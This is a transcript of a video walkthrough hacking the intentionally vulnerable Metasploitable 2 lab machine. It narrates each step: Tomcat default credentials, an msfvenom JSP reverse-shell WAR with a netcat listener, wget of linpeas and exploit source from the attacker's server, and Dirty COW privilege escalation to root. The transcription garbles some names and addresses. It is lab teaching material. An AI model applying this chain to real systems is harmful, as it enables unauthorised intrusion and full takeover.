This is a video about hacking Metasploitable 2. So we've got our Kali Linux running, we've got our Metasploitable running. So we'll log into Metasploitable with MSF admin, password and username. And we'll get our IP address for Metasploitable 2, and we can see it's 10.0.2.4. So just minimize that, and we'll make sure we can ping Metasploitable 10.0.2.4. and we have a connection. So this is a way of hacking Metasploitable. As always, we'll start with an nmap scan. So we'll do an nmap, and then we'll do -a -t4 and 10.0.2.4. We'll run the nmap scan, see what ports are open. I'll just pause the video while that's running. I'll come back when it's finished. Okay, we're back, and we can see we've got lots of ports open. We've got port 21's open, FTP, VS FTPD 2.34, which is another vulnerable way of hacking the machine too, through that backdoor on that version of FTP. But we're not doing that one today. We've got SSH open, 4.7p1. We've got 23 telnet, 25 SMTP, and port 80. But today we're going to be trying to hack in through port 8180, Apache Tomcat. So the first thing we'll do is we'll check out that on the browser. So we'll go to port 8180. And we'll click on Manager. And we need the username and password, which we don't know, so what we'll do is we'll just Google Apache Tomcat and default credentials, and the first post is we have a look at that one, GitHub. We can see there's lots of different ones here, but we'll try Tomcat and Tomcat there for username and password, the same. So we go back here, we'll try Tomcat and password Tomcat, and that's it, we're in. Okay, so we have a look at this. We can see we've got a way to upload a WAR file here. You can browse to it, so we need to create a WAR file. do is we'll, in the terminal, open a new tab. We'll go to where I keep my reverse shells. Yep, and we'll say we use MSF Venom, and we're going to create a war file rshell.war, and we've got our IP address of, that's my IP address of my machine. I can just check that, make sure it's right. I think it is. We'll do IPA 10025, yep. It's going to be a Java/JSP shell reverse TCP, and it's going to be on port L port 4444. So we'll run that. And that'll create the war file. While that's running, we can just clear the screen there. We can do netcat on 444. Let's start our listener ready. That's listening. Just waiting for this to create the war file. Shouldn't take too long. And once it's created, we're going to go to browse here, and we're going to upload our war file, which is already there. So it must be. Have a look. It's been created. So if you do ls, you can see rshell.war. So we'll do a browse on that one, and we'll click on that and open, and we'll deploy it. And we see we've got our rshell here. So we click on rshell there, and go back to our listener, and we have a connection to the target. If we do an ID, you can see we're Tomcat. Use a Tomcat. So if we do which Python, that's just running Python, not Python 3, so we need to let's open this file, and we'll run just Python. Don't get to stabilize our shell. We'll copy that, paste it in there. That's it. Now we've got a more stable shell, and we'll do export term equals x term. Clear the screen again. Alright, so we want to get to root on this machine. At the moment we're only using Tomcat. So we do a who am I Tomcat 55. So we're going to we'll run linpeas. So if we do cd to temp, so we can upload a linpeas script, and we'll go to our where my previous escalation stuff is. We can see we've got linpeas.sh in there. The linpeas is really good for finding vulnerabilities, so you can escalate privileges. So we want to start a Python server so we can upload it to our target. So we'll do Python 3-m. I started a server on 8000. So we'll go back to our target, and we're going to upload that linpeas. So do wget It's 10.0.2.5, which is my IP address. Port 8000 / linpeas.sh, and that's uploaded. We do an ls now, we should be able to see it, yep. So we'll do to change the permissions so it's executable. So we'll do +x linpeas.sh, and we're going to run it. And now we're looking for anything in red we can use to escalate privileges. Just wait till it runs. We can see we've got Linux version 2.624-16, and it's in red, so that means it might be vulnerable. I'll just pause the video and come back when that's finished running. It takes a while sometimes. Okay, we're back. So we can see, if we go back up to the top, all the stuff linpeas gives you, lots of information. We can see we've got sudo version 1.6.9, which might be vulnerable because it's in red. Anything in red you've got to have to take a look at. And this is suggestions from the Linux exploit suggester. So we can see we've got dirty cow here. So let's have a look at that one. So we'll copy that, go to our browser, and put that in there, and we'll 5195 dirty cow, click on that, and we can see, yeah, so creates a default user created as firefart. Got to compile the exploit and then run it /dirty, and then you can log in as firefart and should have root privileges. So you'll if you want to get this, just go copy that there and then git clone, but I've already got it. So if I go in here, have a look. See, I've got dirty cow there, but you would have just, if you wanted to get it, you just do git clone and then what you copied in there. So I'll do cd dirty cow, have a look in there, and we've got dirty.c. So we want to send that to our target, the same way we do with linpeas. So we'll start a Python server again and do a wget http 10.02.5, which is my IP 8000, and it's dirty.c, and that's saved to there now. So what we're going to do next is we want to compile it. So if we have a look here, it says to use this command, so we'll just copy that one. That's compiled now, so if I do an ls, I should be able to see there's dirty there. So if I run dirty, enter a new password, and we'll just say password, And there you go. So now what does it say to do? You can either do an SU to firefight or SSH into firefight. So we'll just do an SSH into that. So do SSH firefight at 10.0.2.4 and put our password in, and we're logged in. So if we do an ID now, you can see we've got root privileges. And we can change, do an export term equals X term, so I can clear the screen again. And if we do cat, have a look at the ECT password file. We can see we've got firefight there now, root isn't there anymore. So what we'll do, next step it says on here is to, don't forget to restore your, after running exploit. So we'll run this command here. Clear the screen again. So now if we do cat password, we can see we've restored root again. So if we do sudo-l, you can see user root may run the following commands, all. So that's just a matter of just put in su root, and there we go, we're root. We do who am I, root, and ID. So we've got full privileges on the machine. That's just one way to hack into Metasploitable 2 and get root privileges. But there's many ways to do it, which I might do some more videos on how to, other methods of getting into it in the future. Alright, so see you next time.